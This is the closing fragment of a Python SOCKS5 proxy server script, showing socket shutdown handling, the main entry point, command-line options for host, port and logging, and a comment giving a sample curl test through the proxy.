self.logger.critical('Error in server socket; closing down')
for c in connected_sockets:
c.close()
self.server_sock.close()
sys.exit(1)
else:
self.flush_and_close_sock_pair(sock, 'Unknown socket error')
def main(args):
logger = make_logger(log_path=args.log_path, log_level_str=args.log_level)
socks5_server = Socks5Server(args.host, args.port, logger)
socks5_server.serve_forever()
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-s', '--host', action='store', default='',
help='IP/Hostname to serve on', type=str)
parser.add_argument('-p', '--port', action='store', default=1080,
help='Port to serve on', type=int)
    parser.add_argument('--log-path', action='store', default=None,
                        help='Log file path', type=str)
    parser.add_argument('--log-level', action='store', default='INFO',
                        help='DEBUG, INFO, WARNING, ERROR, or CRITICAL', type=str)
args = parser.parse_args()
main(args)
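
    # --- Editorial note (not in the original script): once running, the proxy
    # can be exercised with, e.g.:
    #   curl --socks5 localhost:1080 http://example.com/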
| 39.568093
| 99
| 0.601239
|